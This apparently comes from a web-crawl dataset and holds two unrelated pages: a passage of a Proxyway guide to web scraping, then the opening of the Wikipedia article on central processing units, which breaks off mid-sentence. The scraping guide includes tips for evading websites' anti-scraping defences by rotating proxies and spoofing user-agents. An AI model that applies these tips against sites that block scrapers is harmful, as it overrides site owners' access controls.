research the market by scraping the product and pricing information of competitors. Others aggregate data from multiple sources for example, flight companies to present great deals. Still others scrape various public sources like YellowPages and Crunchbase to find business leads. Read more: The Main Uses of Web Scraping. Web scraping involves multiple steps done in a succession: 1. Identify your target web pages. For example, you may want to scrape all products in a category of an e-commerce store. You can do it by hand or build something called a web crawler to find relevant URLs. 2. Download their HTML code. Every webpage is built using HTML; you can see how it looks by pressing the right mouse button in your web browser and. selecting Inspect. 3. Extract the data points you want. HTML is messy and has unnecessary information, so you’ll need to clean it up. This process is called data parsing. The end result is structured data in a .json, .csv file, or another readable format. 4. Adjust your web scraper as needed. Websites tend to change often, and you might find more efficient ways to do things. There are many tools to facilitate the data scraping process or offload some of the work from you. Ready-made web scrapers let you avoid building your own; proxies can help you circumvent blocks; and if you want, you can get scraping services to do the whole job for you. Web scraping is not exactly a very welcome or sometimes ethical affair. Scrapers often ignore the website’s guidelines (ToS and robots.txt), bring down its servers with too many requests, or even appropriate the data they scrape to launch a competing service. It’s no wonder many websites are keen on blocking any crawler or scraper in sight (except for, of course, search engines). Still, web scraping as such is legal, with some limitations. Over the years, there have been a number of landmark cases. We’re no lawyers, but it has been established that web scraping a website is okay as long as the information is publicly available and doesn’t involve copyrighted or personal information. Since the question of web scraping isn’t always straightforward each use case is considered individually it’s wise to seek legal advice. Web scraping is not the only method for getting data from websites. In fact, it’s not even the default one. The preferred approach is using an API. An API, or application programming interface, provides a method to interact with a certain website or app programmatically. Websites like reddit.com have APIs that allow anyone to download their contents. However, APIs have problems. First, not all websites offer them. Second, the data an API gives can often be stale. Third, you often have to deal with limits on what data you can collect and how often. And finally, for some reason APIs tend to change or break more often than even web scraping scripts. So, the main difference between web scraping and an API is that the former gives better access to data: whatever you can see in your browser, you can get. However, web scraping often happens without websites knowing about it. And when they do find out, they’re not very happy about it. There’s no shortage of web scraping tools in the market. If you want, you can even scrape with Microsoft Excel. Should you, though? Probably not. Web scraping tools can be divided into three categories: 1) custom-built, 2) ready-made, and 3) web scraping APIs. One way to go about scraping is to build a scraper yourself. There are relevant libraries and frameworks in various programming languages, but web scraping with Python and node.js are the most popular approaches. Here’s why: For those without programming skills or time, you can go with ready-made web scraping tools. No-code web scrapers have everything configured for you and are wrapped in a nice user interface. They let you scrape without any programming knowledge. However, their visual controls and focus on beginners may make them less suitable for serious projects. The middle ground between the first two categories is web scraping APIs. They have a steeper learning curve than visual scrapers but are more extensible. In essence, these APIs handle proxies and the web scraping logic, so that you can extract data by making a simple API call to the provider’s infrastructure. Read more: The Best Web Scraping Tools. Web scraping isn’t easy; some websites do their best to ensure you can’t catch a break. Here are some of the obstacles you might encounter Modern websites use request throttling to avoid overloading the servers and unnecessary connection interruptions. The website controls how often you can send requests within a specific time window. When you reach the limit, your web scraper won’t be able to perform any further actions. If you ignore it, you might block your IP address. Another challenge that can greatly hinder your web scraping efforts is CAPTCHAs. It’s a technique used to fight bots. They can be triggered because you’re making too many requests in a short time, 2) using low-quality proxies, or 3) not covering your web scraper’s fingerprint properly. Some CAPTCHAs are hard-coded into the HTML markup and appear at certain points like registration. And until you pass the test, your scraper is out of work. The most gruesome way a website can punish you for scraping is by blocking your IP address. However, there’s a problem with IP bans the website’s owner can ban a whole range of IPs (256), so all the people who share the same subnet will lose access. That’s why websites are reluctant to use this method. Read more: Web Scraping Challenges and Ways to Overcome Them. Here are some web scraping best practices to help your project succeed. First and foremost, respect the website you’re scraping. You should read data privacy regulations and respect the website’s terms of service. Also, most websites have a robots.txt file it gives instructions on which content a crawler can access and what it should avoid. Websites can track your actions. If you send too many requests, your actions will be red-flagged. So, you should act naturally by keeping random intervals between connection requests and reducing the crawling rate. And if you don’t want to burden both the website and your web scraper, don’t collect data during the peak hours. Another critical step is to take care of your digital identity. Websites use anti-scraping technologies like CAPTCHAs, IP blocks, and request throttling. To avoid these and other obstacles rotate your proxies and the user-agent. The first covers location hiding, and the latter browser spoofing. So, every time you connect, you’ll have a “new” identity. Read more: Web Scraping Best Practices. Let’s say you want to build your first Python web scraper. How do you go about it? Well, you can write a simple tool with just a few lines of code, but there are a few steps you should follow: 1. If you’re a newbie to web scraping, go with libraries like Requests and Beautiful Soup. Requests is an HTTP client that will fetch you raw HTML, while Beautiful Soup will structure the data you’ve downloaded. 2. Then, decide on a target website and project parameters like URLs and data points you want to scrape. If you don’t have any particular website in mind, choose a dummy site to practice your scraping skills. 3. To build your web scraper, you’ll also need a code editor. You can choose any editor you like, Notepad , Visual Studio Code, or use the one preinstalled on your computer. Once you have all the prerequisites, you can write your first Python script send HTTP requests to the website, parse the HTML response, and save the data. Read more: Python Web Scraping Tutorial. With Requests and Beautiful Soup you can learn basic skills by scraping static data. If you want to target dynamic websites and learn how to deal with things like infinite scrolling and lazy loading, go with Selenium. The tool controls a headless browser and is fully capable of dealing with dynamic pages. Read more: Web Scraping with Selenium: An Ultimate Guide for Beginners. You’re not limited to web scraping using Selenium and Python. There are other powerful headless browsers that can deal with JavaScript-rendered web pages. For example, if you want to try web scraping with NodeJS, go with Playwright or Puppeteer. Both tools are much lighter on resources than Selenium and easier to set up. You May Also Like: Web Scraping with Node.js: A Practical Guide for Beginners Web Scraping with Python: All You Need to Get Started 2 Responses Excellent work, Nice explication. Thanks Leave a Reply Cancel reply Your email address will not be published. Required fields are marked Comment Name Email Scammers are pretending to be Proxyway. All official communications are handled through email only and not Telegram. |
179 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Central_processing_unit | A central processing unit (CPU), also called a central processor, main processor, or just processor, is the most important processor in a given computer. 1 2 Its electronic circuitry executes instructions of a computer program, such as arithmetic, logic, controlling, and input output (I O) operations. 3 4 5 This role contrasts with that of external components, such as main memory and I O circuitry, 6 and specialized coprocessors such as graphics processing units (GPUs). The form, design, and implementation of CPUs have changed over time, but their fundamental operation remains almost unchanged. 7 Principal components of a CPU include the arithmetic logic unit (ALU) that performs arithmetic and logic operations, processor registers that supply operands to the ALU and store the results of ALU operations, and a control unit that orchestrates the fetching (from memory), decoding and execution (of instructions) by directing the coordinated operations of the ALU, registers, and other components. Modern CPUs devote a lot of semiconductor area to caches and instruction-level parallelism to increase performance and to CPU modes to support operating systems and virtualization. Most modern CPUs are implemented on integrated circuit (IC) microprocessors, with one or more CPUs on a single IC chip. Microprocessor chips with multiple CPUs are called multi-core processors. 8 The individual physical CPUs, called processor cores, can also be multithreaded to support CPU-level multithreading. 9 An IC that contains a CPU may also contain memory, peripheral interfaces, and other components of a computer; 10 such integrated devices are variously called microcontrollers or systems on a chip (SoC). Early computers such as the ENIAC had to be physically rewired to perform different tasks, which caused these machines to be called "fixed-program computers". 11 The "central processing unit" term has been in use since as early as 1955. 12 13 Since the term "CPU" is generally defined as a device for software (computer program) execution, the earliest devices that could rightly be called CPUs came with the advent of the stored-program computer. The idea of a stored-program computer had been already present in the design of J. Presper Eckert and John William Mauchly's ENIAC, but was initially omitted so that ENIAC could be finished sooner. 14 On June 30, 1945, before ENIAC was made, mathematician John von Neumann distributed a paper entitled First Draft of a Report on the EDVAC. It was the outline of a stored-program computer that would eventually be completed in August 1949. 15 EDVAC was designed to perform a certain number of instructions (or operations) of various types. Significantly, the programs written for EDVAC were to be stored in high-speed computer memory rather than specified by the physical wiring of the computer. 16 This overcame a severe limitation of ENIAC, which was the considerable time and effort required to reconfigure the computer to perform a new task. 17 With von Neumann's design, the program that EDVAC ran could be changed simply by changing the contents of the memory. EDVAC was not the first stored-program computer; the Manchester Baby, which was a small-scale experimental stored-program computer, ran its first program on 21 June 1948 18 and the Manchester Mark 1 ran its first program during the night of 16 17 June 1949. 19 Early CPUs were custom designs used as part of a larger and sometimes distinctive computer. 20 However, this method of designing custom CPUs for a particular application has largely given way to the development of multi-purpose processors produced in large quantities. This standardization began in the era of discrete transistor mainframes and minicomputers, and has rapidly accelerated with the popularization of the integrated circuit (IC). The IC has allowed increasingly complex CPUs to be designed and manufactured to tolerances on the order of nanometers. 21 Both the miniaturization and standardization of CPUs have increased the presence of digital devices in modern life far beyond the limited application of dedicated computing machines. Modern microprocessors appear in electronic devices ranging from automobiles 22 to cellphones, 23 and sometimes even in toys. 24 25 While von Neumann is most often credited with the design of the stored-program computer because of his design of EDVAC, and the design became known as the von Neumann architecture, others before him, such as Konrad Zuse, had suggested and implemented similar ideas. 26 The so-called Harvard architecture of the Harvard Mark I, which was completed before EDVAC, 27 28 also used a stored-program design using punched paper tape rather than electronic memory. 29 The key difference between the von Neumann and Harvard architectures is that the latter separates the storage and treatment of CPU instructions and data, while the former uses the same memory space for both. 30 Most modern CPUs are primarily von Neumann in design, but CPUs with the Harvard architecture are seen as well, especially in embedded applications; for instance, the Atmel AVR microcontrollers are Harvard-architecture processors. 31 Relays and vacuum tubes (thermionic tubes) were commonly used as switching elements; 32 33 a useful computer requires thousands or tens of thousands of switching devices. The overall speed of a system is dependent on the speed of the switches. Vacuum-tube computers such as EDVAC tended to average eight hours between failures, whereas relay computers—such as the slower but earlier Harvard Mark I—failed very rarely. 13 In the end, tube-based CPUs became dominant because the significant speed advantages afforded generally outweighed the reliability problems. Most of these early synchronous CPUs ran at low clock rates compared to modern microelectronic designs. Clock signal frequencies ranging from 100 kHz to 4 MHz were very common at this time, limited largely by the speed of the switching devices they were built with. 34 The design complexity of CPUs increased as various technologies facilitated the building of smaller and more reliable electronic devices. The first such improvement came with the advent of the transistor. Transistorized CPUs during the 1950s and 1960s no longer had to be built out of bulky, unreliable, and fragile switching elements, like vacuum tubes and relays. 35 With this improvement, more complex and reliable CPUs were built onto one or several printed circuit boards containing discrete (individual) components. In 1964, IBM introduced its IBM System 360 computer architecture that was used in a series of computers capable of running the same programs with different speeds and performances. 36 This was significant at a time when most electronic computers were incompatible with one another, even those made by the same manufacturer. To facilitate this improvement, IBM used the concept of a microprogram (often called "microcode"), which still sees widespread use in modern CPUs. 37 The System 360 architecture was so popular that it dominated the mainframe computer market for decades and left a legacy that is continued by similar modern computers like the IBM zSeries. 38 39 In 1965, Digital Equipment Corporation (DEC) introduced another influential computer aimed at the scientific and research markets—the PDP 8. 40 Transistor-based computers had several distinct advantages over their predecessors. Aside from facilitating increased reliability and lower power consumption, transistors also allowed CPUs to operate at much higher speeds because of the short switching time of a transistor in comparison to a tube or relay. 41 The increased reliability and dramatically increased speed of the switching elements, which were almost exclusively transistors by this time; CPU clock rates in the tens of megahertz were easily obtained during this period. 42 Additionally, while discrete transistor and IC CPUs were in heavy usage, new high-performance designs like single instruction, multiple data (SIMD) vector processors began to appear. 43 These early experimental designs later gave rise to the era of specialized supercomputers like those made by Cray Inc and Fujitsu Ltd. 43 During this period, a method of manufacturing many interconnected transistors in a compact space was developed. The integrated circuit (IC) allowed a large number of transistors to be manufactured on a single semiconductor-based die, or "chip". At first, only very basic non-specialized digital circuits such as NOR gates were miniaturized into ICs. 44 CPUs based on these "building block" ICs are generally referred to as "small-scale integration" (SSI) devices. SSI ICs, such as the ones used in the Apollo Guidance Computer, usually contained up to a few dozen transistors. To build an entire CPU out of SSI ICs required thousands of individual chips, but still consumed much less space and power than earlier discrete transistor designs. 45 IBM's System 370, follow-on to the System 360, used SSI ICs rather than Solid Logic Technology discrete-transistor modules. 46 47 DEC's PDP 8 I and KI10 PDP 10 also switched from the individual transistors used by the PDP 8 and PDP 10 to SSI ICs, 48 and their extremely popular PDP 11 line was originally built with SSI ICs, but was eventually implemented with LSI components once these became practical. Lee Boysel published influential articles, including a 1967 "manifesto", which described how to build the equivalent of a 32 bit mainframe computer from a relatively small number of large-scale integration circuits (LSI). 49 50 The only way to build LSI chips, which are chips with a hundred or more gates, was to build them using a metal oxide semiconductor (MOS) semiconductor manufacturing process (either PMOS logic, NMOS logic, or CMOS logic). However, some companies continued to build processors out of bipolar transistor transistor logic (TTL) chips because bipolar junction transistors were faster than MOS chips up until the 1970s (a few companies such as Datapoint continued to build processors out of TTL chips until the early 1980s). 50 In the 1960s, MOS ICs were slower and initially considered useful only in applications that required low power. 51 52 Following the development of silicon-gate MOS technology by Federico Faggin at Fairchild Semiconductor in 1968, MOS ICs largely replaced bipolar TTL as the standard chip technology in the early 1970s. 53 As the microelectronic technology advanced, an increasing number of transistors were placed on ICs, decreasing the number of individual ICs needed for a complete CPU. MSI and LSI ICs increased transistor counts to hundreds, and then thousands. By 1968, the number of ICs required to build a complete CPU had been reduced to 24 ICs of eight different types, with each IC containing roughly 1000 MOSFETs. 54 In stark contrast with its SSI and MSI predecessors, the first LSI implementation of the PDP 11 contained a CPU composed of only four LSI integrated circuits. 55 Since microprocessors were first introduced they have almost completely overtaken all other central processing unit implementation methods. The first commercially available microprocessor, made in 1971, was the Intel 4004, and the first widely used microprocessor, made in 1974, was the Intel 8080. Mainframe and minicomputer manufacturers of the time launched proprietary IC development programs to upgrade their older computer architectures, and eventually produced instruction set compatible microprocessors that were backward-compatible with their older hardware and software. Combined with the advent and eventual success of the ubiquitous personal computer, the term CPU is now applied almost exclusively a to microprocessors. Several CPUs (denoted cores) can be combined in a single processing chip. 56 Previous generations of CPUs were implemented as discrete components and numerous small integrated circuits (ICs) on one or more circuit boards. 57 Microprocessors, on the other hand, are CPUs manufactured on a very small number of ICs; usually just one. 58 The overall smaller CPU size, as a result of being implemented on a single die, means faster switching time because of physical factors like decreased gate parasitic capacitance. 59 60 This has allowed synchronous microprocessors to have clock rates ranging from tens of megahertz to several gigahertz. Additionally, the ability to construct exceedingly small transistors on an IC has increased the complexity and number of transistors in a single CPU many fold. This widely observed trend is described by Moore's law, which had proven to be a fairly accurate predictor of the growth of CPU (and other IC) complexity until 2016. 61 62 While the complexity, size, construction and general form of CPUs have changed enormously since 1950, 63 the basic design and function has not changed much at all. Almost all common CPUs today can be very accurately described as von Neumann stored-program machines. 64 b As Moore's law no longer holds, concerns have arisen about the limits of integrated circuit transistor technology. Extreme miniaturization of electronic gates is causing the effects of phenomena like electromigration and subthreshold leakage to become much more significant. 66 67 These newer concerns are among the many factors causing researchers to investigate new methods of computing such as the quantum computer, as well as to expand the use of parallelism and other methods that extend the usefulness of the classical von Neumann model. The fundamental operation of most CPUs, regardless of the physical form they take, is to execute a sequence of stored instructions that is called a program. The instructions to be executed are kept in some kind of computer memory. Nearly all CPUs follow the fetch, decode and execute steps in their operation, which are collectively known as the instruction cycle. After the execution of an instruction, the entire process repeats, with the next instruction cycle normally fetching the next-in-sequence instruction because of the incremented value in the program counter. If a jump instruction was executed, the program counter will be modified to contain the address of the instruction that was jumped to and program execution continues normally. In more complex CPUs, multiple instructions can be fetched, decoded and executed simultaneously. This section describes what is generally referred to as the "classic RISC pipeline", which is quite common among the simple CPUs used in many electronic devices (often called microcontrollers). It largely ignores the important role of CPU cache, and therefore the access stage of the pipeline. Some instructions manipulate the program counter rather than producing result data directly; such instructions are generally called "jumps" and facilitate program behavior like loops, conditional program execution (through the use of a conditional jump), and existence of functions. c In some processors, some other instructions change the state of bits in a "flags" register. These flags can be used to influence how a program behaves, since they often indicate the outcome of various operations. For example, in such processors a "compare" instruction evaluates two values and sets or clears bits in the flags register to indicate which one is greater or whether they are equal; one of these flags could then be used by a later jump instruction to determine program flow. Fetch involves retrieving an instruction (which is represented by a number or sequence of numbers) from program memory. The instruction's location (address) in program memory is determined by the program counter (PC; called the "instruction pointer" in Intel x86 microprocessors), which stores a number that identifies the address of the next instruction to be fetched. After an instruction is fetched, the PC is incremented by the length of the instruction so that it will contain the address of the next instruction in the sequence. d Often, the instruction to be fetched must be retrieved from relatively slow memory, causing the CPU to stall while waiting for the instruction to be returned. This issue is largely addressed in modern processors by caches and pipeline architectures (see below). The instruction that the CPU fetches from memory determines what the CPU will do. In the decode step, performed by binary decoder circuitry known as the instruction decoder, the instruction is converted into signals that control other parts of the CPU. The way in which the instruction is interpreted is defined by the CPU's instruction set architecture (ISA). e Often, one group of bits (that is, a "field") within the instruction, called the opcode, indicates which operation is to be performed, while the remaining fields usually provide supplemental information required for the operation, such as the operands. Those operands may be specified as a constant value (called an immediate value), or as the location of a value that may be a processor register or a memory address, as determined by some addressing mode. In some CPU designs the instruction decoder is implemented as a hardwired, unchangeable binary decoder circuit. In others, a microprogram is used to translate instructions into sets of CPU configuration signals that are applied sequentially over multiple clock pulses. In some cases the memory that stores the microprogram is rewritable, making it possible to change the way in which the CPU decodes instructions. After the fetch and decode steps, the execute step is performed. Depending on the CPU architecture, this may consist of a single action or a sequence of actions. During each action, control signals electrically enable or disable various parts of the CPU so they can perform all or part of the desired operation. The action is then completed, typically in response to a clock pulse. Very often the results are written to an internal CPU register for quick access by subsequent instructions. In other cases results may be written to slower, but less expensive and higher capacity main memory. For example, if an instruction that performs addition is to be executed, registers containing operands (numbers to be summed) are activated, as are the parts of the arithmetic logic unit (ALU) that perform addition. When the clock pulse occurs, the operands flow from the source registers into the ALU, and the sum appears at its output. On subsequent clock pulses, other components are enabled (and disabled) to move the output (the sum of the operation) to storage (e.g., a register or memory). If the resulting sum is too large (i.e., it is larger than the ALU's output word size), an arithmetic overflow flag will be set, influencing the next operation. Hardwired into a CPU's circuitry is a set of basic operations it can perform, called an instruction set. Such operations may involve, for example, adding or subtracting two numbers, comparing two numbers, or jumping to a different part of a program. Each instruction is represented by a unique combination of bits, known as the machine language opcode. While processing an instruction, the CPU decodes the opcode (via a binary decoder) into control signals, which orchestrate the behavior of the CPU. A complete machine language instruction consists of an opcode and, in many cases, additional bits that specify arguments for the operation (for example, the numbers to be summed in the case of an addition operation). Going up the complexity scale, a machine language program is a collection of machine language instructions that the CPU executes. The actual mathematical operation for each instruction is performed by a combinational logic circuit within the CPU's processor known as the arithmetic logic unit or ALU. In general, a CPU executes an instruction by fetching it from memory, using its ALU to perform an operation, and then storing the result to memory. Besides the instructions for integer mathematics and logic operations, various other machine instructions exist, such as those for loading data from memory and storing it back, branching operations, and mathematical operations on floating-point numbers performed by the CPU's floating-point unit (FPU). 68 The control unit (CU) is a component of the CPU that directs the operation of the processor. It tells the computer's memory, arithmetic and logic unit and input and output devices how to respond to the instructions that have been sent to the processor. It directs the operation of the other units by providing timing and control signals. Most computer resources are managed by the CU. It directs the flow of data between the CPU and the other devices. John von Neumann included the control unit as part of the von Neumann architecture. In modern computer designs, the control unit is typically an internal part of the CPU with its overall role and operation unchanged since its introduction. 69 The arithmetic logic unit (ALU) is a digital circuit within the processor that performs integer arithmetic and bitwise logic operations. The inputs to the ALU are the data words to be operated on (called operands), status information from previous operations, and a code from the control unit indicating which operation to perform. Depending on the instruction being executed, the operands may come from internal CPU registers, external memory, or constants generated by the ALU itself. When all input signals have settled and propagated through the ALU circuitry, the result of the performed operation appears at the ALU's outputs. The result consists of both a data word, which may be stored in a register or memory, and status information that is typically stored in a special, internal CPU register reserved for this purpose. Modern CPUs typically contain more than one ALU to improve performance. The address generation unit (AGU), sometimes also called the address computation unit (ACU), 70 is an execution unit inside the CPU that calculates addresses used by the CPU to access main memory. By having address calculations handled by separate circuitry that operates in parallel with the rest of the CPU, the number of CPU cycles required for executing various machine instructions can be reduced, bringing performance improvements. While performing various operations, CPUs need to calculate memory addresses required for fetching data from the memory; for example, in-memory positions of array elements must be calculated before the CPU can fetch the data from actual memory locations. Those address-generation calculations involve different integer arithmetic operations, such as addition, subtraction, modulo operations, or bit shifts. Often, calculating a memory address involves more than one general-purpose machine instruction, which do not necessarily decode and execute quickly. By incorporating an AGU into a CPU design, together with introducing specialized instructions that use the AGU, various address-generation calculations can be offloaded from the rest of the CPU, and can often be executed quickly in a single CPU cycle. Capabilities of an AGU depend on a particular CPU and its architecture. Thus, some AGUs implement and expose more address-calculation operations, while some also include more advanced specialized instructions that can operate on multiple operands at a time. Some CPU architectures include multiple AGUs so more than one address-calculation operation can be executed simultaneously, which brings further performance improvements due to the superscalar nature of advanced CPU designs. For example, Intel incorporates multiple AGUs into its Sandy Bridge and Haswell microarchitectures, which increase bandwidth of the CPU memory subsystem by allowing multiple memory-access instructions to be executed in parallel. Many microprocessors (in smartphones and desktop, laptop, server computers) have a memory management unit, translating logical addresses into physical RAM addresses, providing memory protection and paging abilities, useful for virtual memory. Simpler processors, especially microcontrollers, usually don't include an MMU. A CPU cache 71 is a hardware cache used by the central processing unit (CPU) of a computer to reduce the average cost (time or energy) to access data from the main memory. A cache is a smaller, faster memory, closer to a processor core, which stores copies of the data from frequently used main memory locations. Most CPUs have different independent caches, including instruction and data caches, where the data cache is usually organized as a hierarchy of more cache levels (L1, L2, L3, L4, etc.). All modern (fast) CPUs (with few specialized exceptions f ) have multiple levels of CPU caches. The first CPUs that used a cache had only one level of cache; unlike later level 1 caches, it was not split into L1d (for data) and L1i (for instructions). Almost all current CPUs with caches have a split L1 cache. They also have L2 caches and, for larger processors, L3 caches as well. The L2 cache is usually not split and acts as a common repository for the already split L1 cache. Every core of a multi-core processor has a dedicated L2 cache and is usually not shared between the cores. The L3 cache, and higher-level caches, are shared between the cores and are not split. An L4 cache is currently uncommon, and is generally on dynamic random-access memory (DRAM), rather than on static random-access memory (SRAM), on a separate die or chip. That was also the case historically with L1, while bigger chips have allowed integration of it and generally all cache levels, with the possible exception of the last level. Each extra level of cache tends to be bigger and is optimized differently. Other types of caches exist (that are not counted towards the "cache size" of the most important caches mentioned above), such as the translation lookaside buffer (TLB) that is part of the memory management unit (MMU) that most CPUs have. Caches are generally sized in powers of two: 2, 8, 16 etc. KiB or MiB (for larger non-L1) sizes, although the IBM z13 has a 96 KiB L1 instruction cache. 72 Most CPUs are synchronous circuits, which means they employ a clock signal to pace their sequential operations. The clock signal is produced by an external oscillator circuit that generates a consistent number of pulses each second in the form of a periodic square wave. The frequency of the clock pulses determines the rate at which a CPU executes instructions and, consequently, the faster the clock, the more instructions the CPU will execute each second. To ensure proper operation of the CPU, the clock period is longer than the maximum time needed for all signals to propagate (move) through the CPU. In setting the clock period to a value well above the worst-case propagation delay, it is possible to design the entire CPU and the way it moves data around the "edges" of the rising and falling clock signal. This has the advantage of simplifying the CPU significantly, both from a design perspective and a component-count perspective. However, it also carries the disadvantage that the entire CPU must wait on its slowest elements, even though some portions of it are much faster. This limitation has largely been compensated for by various methods of increasing CPU parallelism (see below). However, architectural improvements alone do not solve all of the drawbacks of globally synchronous CPUs. For example, a clock signal is subject to the delays of any other electrical signal. Higher clock rates in increasingly complex CPUs make it more difficult to keep the clock signal in phase (synchronized) throughout the entire unit. This has led many modern CPUs to require multiple identical clock signals to be provided to avoid delaying a single signal significantly enough to cause the CPU to malfunction. Another major issue, as clock rates increase dramatically, is the amount of heat that is dissipated by the CPU. The constantly changing clock causes many components to switch regardless of whether they are being used at that time. In general, a component that is switching uses more energy than an element in a static state. Therefore, as clock rate increases, so does energy consumption, causing the CPU to require more heat dissipation in the form of CPU cooling solutions. One method of dealing with the switching of unneeded components is called clock gating, which involves turning off the clock signal to unneeded components (effectively disabling them). However, this is often regarded as difficult to implement and therefore does not see common usage outside of very low-power designs. One notable recent CPU design that uses extensive clock gating is the IBM PowerPC-based Xenon used in the Xbox 360; this reduces the power requirements of the Xbox 360. 73 Another method of addressing some of the problems with a global clock signal is the removal of the clock signal altogether. While removing the global clock signal makes the design process considerably more complex in many ways, asynchronous (or clockless) designs carry marked advantages in power consumption and heat dissipation in comparison with similar synchronous designs. While somewhat uncommon, entire asynchronous CPUs have been built without using a global clock signal. Two notable examples of this are the ARM compliant AMULET and the MIPS R3000 compatible MiniMIPS. 74 Rather than totally removing the clock signal, some CPU designs allow certain portions of the device to be asynchronous, such as using asynchronous ALUs in conjunction with superscalar pipelining to achieve some arithmetic performance gains. While it is not altogether clear whether totally asynchronous designs can perform at a comparable or better level than their synchronous counterparts, it is evident that they do at least excel in simpler math operations. This, combined with their excellent power consumption and heat dissipation properties, makes them very suitable for embedded computers. 75 Many modern CPUs have a die-integrated power managing module which regulates on-demand voltage supply to the CPU circuitry allowing it to keep balance between performance and power consumption. Every CPU represents numerical values in a specific way. For example, some early digital computers represented numbers as familiar decimal (base 10) numeral system values, and others have employed more unusual representations such as ternary (base three). Nearly all modern CPUs represent numbers in binary form, with each digit being represented by some two-valued physical quantity such as a "high" or "low" voltage. g Related to numeric representation is the size and precision of integer numbers that a CPU can represent. In the case of a binary CPU, this is measured by the number of bits (significant digits of a binary encoded integer) that the CPU can process in one operation, which is commonly called word size, bit width, data path width, integer precision, or integer size. A CPU's integer size determines the range of integer values on which it can directly operate. h For example, an 8 bit CPU can directly manipulate integers represented by eight bits, which have a range of 256 (28) discrete integer values. Integer range can also affect the number of memory locations the CPU can directly address (an address is an integer value representing a specific memory location). For example, if a binary CPU uses 32 bits to represent a memory address then it can directly address 232 memory locations. To circumvent this limitation and for various other reasons, some CPUs use mechanisms (such as bank switching) that allow additional memory to be addressed. CPUs with larger word sizes require more circuitry and consequently are physically larger, cost more and consume more power (and therefore generate more heat). As a result, smaller 4 or 8 bit microcontrollers are commonly used in modern applications even though CPUs with much larger word sizes (such as 16, 32, 64, even 128 bit) are available. When higher performance is required, however, the benefits of a larger word size (larger data ranges and address spaces) may outweigh the disadvantages. A CPU can have internal data paths shorter than the word size to reduce size and cost. For example, even though the IBM System 360 instruction set architecture was a 32 bit instruction set, the System 360 Model 30 and Model 40 had 8 bit data paths in the arithmetic logical unit, so that a 32 bit add required four cycles, one for each 8 bits of the operands, and, even though the Motorola 68000 series instruction set was a 32 bit instruction set, the Motorola 68000 and Motorola 68010 had 16 bit data paths in the arithmetic logical unit, so that a 32 bit add required two cycles. To gain some of the advantages afforded by both lower and higher bit lengths, many instruction sets have different bit widths for integer and floating-point data, allowing CPUs implementing that instruction set to have different bit widths for different portions of the device. For example, the IBM System 360 instruction set was primarily 32 bit, but supported 64 bit floating-point values to facilitate greater accuracy and range in floating-point numbers. 37 The System 360 Model 65 had an 8 bit adder for decimal and fixed-point binary arithmetic and a 60 bit adder for floating-point arithmetic. 76 Many later CPU designs use similar mixed bit width, especially when the processor is meant for general-purpose use where a reasonable balance of integer and floating-point capability is required. The description of the basic operation of a CPU offered in the previous section describes the simplest form that a CPU can take. This type of CPU, usually referred to as subscalar, operates on and executes one instruction on one or two pieces of data at a time, that is less than one instruction per clock cycle (IPC 1). This process gives rise to an inherent inefficiency in subscalar CPUs. Since only one instruction is executed at a time, the entire CPU must wait for that instruction to complete before proceeding to the next instruction. As a result, the subscalar CPU gets "hung up" on instructions which take more than one clock cycle to complete execution. Even adding a second execution unit (see below) does not improve performance much; rather than one pathway being hung up, now two pathways are hung up and the number of unused transistors is increased. This design, wherein the CPU's execution resources can operate on only one instruction at a time, can only possibly reach scalar performance (one instruction per clock cycle, IPC 1). However, the performance is nearly always subscalar (less than one instruction per clock cycle, IPC 1). Attempts to achieve scalar and better performance have resulted in a variety of design methodologies that cause the CPU to behave less linearly and more in parallel. When referring to parallelism in CPUs, two terms are generally used to classify these design techniques: Each methodology differs both in the ways in which they are implemented, as well as the relative effectiveness they afford in increasing the CPU's performance for an application. i One of the simplest methods for increased parallelism is to begin the first steps of instruction fetching and decoding before the prior instruction finishes executing. This is a technique known as instruction pipelining, and is used in almost all modern general-purpose CPUs. Pipelining allows multiple instruction to be executed at a time by breaking the execution pathway into discrete stages. This separation can be compared to an assembly line, in which an instruction is made more complete at each stage until it exits the execution pipeline and is retired. Pipelining does, however, introduce the possibility for a situation where the result of the previous operation is needed to complete the next operation; a condition often termed data dependency conflict. Therefore, pipelined processors must check for these sorts of conditions and delay a portion of the pipeline if necessary. A pipelined processor can become very nearly scalar, inhibited only by pipeline stalls (an instruction spending more than one clock cycle in a stage). Improvements in instruction pipelining led to further decreases in the idle time of CPU components. Designs that are said to be superscalar include a long instruction pipeline and multiple identical execution units, such as load store units, arithmetic logic units, floating-point units and address generation units. 77 In a superscalar pipeline, instructions are read and passed to a dispatcher, which decides whether or not the instructions can be executed in parallel (simultaneously). If so, they are dispatched to execution units, resulting in their simultaneous execution. In general, the number of instructions that a superscalar CPU will complete in a cycle is dependent on the number of instructions it is able to dispatch simultaneously to execution units. Most of the difficulty in the design of a superscalar CPU architecture lies in creating an effective dispatcher. The dispatcher needs to be able to quickly determine whether instructions can be executed in parallel, as well as dispatch them in such a way as to keep as many execution units busy as possible. This requires that the instruction pipeline is filled as often as possible and requires significant amounts of CPU cache. It also makes hazard-avoiding techniques like branch prediction, speculative execution, register renaming, out-of-order execution and transactional memory crucial to maintaining high levels of performance. By attempting to predict which branch (or path) a conditional instruction will take, the CPU can minimize the number of times that the entire pipeline must wait until a conditional instruction is completed. Speculative execution often provides modest performance increases by executing portions of code that may not be needed after a conditional operation completes. Out-of-order execution somewhat rearranges the order in which instructions are executed to reduce delays due to data dependencies. Also in case of single instruction stream, multiple data stream, a case when a lot of data from the same type has to be processed, modern processors can disable parts of the pipeline so that when a single instruction is executed many times, the CPU skips the fetch and decode phases and thus greatly increases performance on certain occasions, especially in highly monotonous program engines such as video creation software and photo processing. When a fraction of the CPU is superscalar, the part that is not suffers a performance penalty due to scheduling stalls. The Intel P5 Pentium had two superscalar ALUs which could accept one instruction per clock cycle each, but its FPU could not. Thus the P5 was integer superscalar but not floating point superscalar. Intel's successor to the P5 architecture, P6, added superscalar abilities to its floating-point features. Simple pipelining and superscalar design increase a CPU's ILP by allowing it to execute instructions at rates surpassing one instruction per clock cycle. Most modern CPU designs are at least somewhat superscalar, and nearly all general purpose CPUs designed in the last decade are superscalar. In later years some of the emphasis in designing high-ILP computers has been moved out of the CPU's hardware and into its software interface, or instruction set architecture (ISA). The strategy of the very long instruction word (VLIW) causes some ILP to become implied directly by the software, reducing the CPU's work in boosting ILP and thereby reducing design complexity. Another strategy of achieving performance is to execute multiple threads or processes in parallel. This area of research is known as parallel computing. 78 In Flynn's taxonomy, this strategy is known as multiple instruction stream, multiple data stream (MIMD). 79 One technology used for this purpose is multiprocessing (MP). 80 The initial type of this 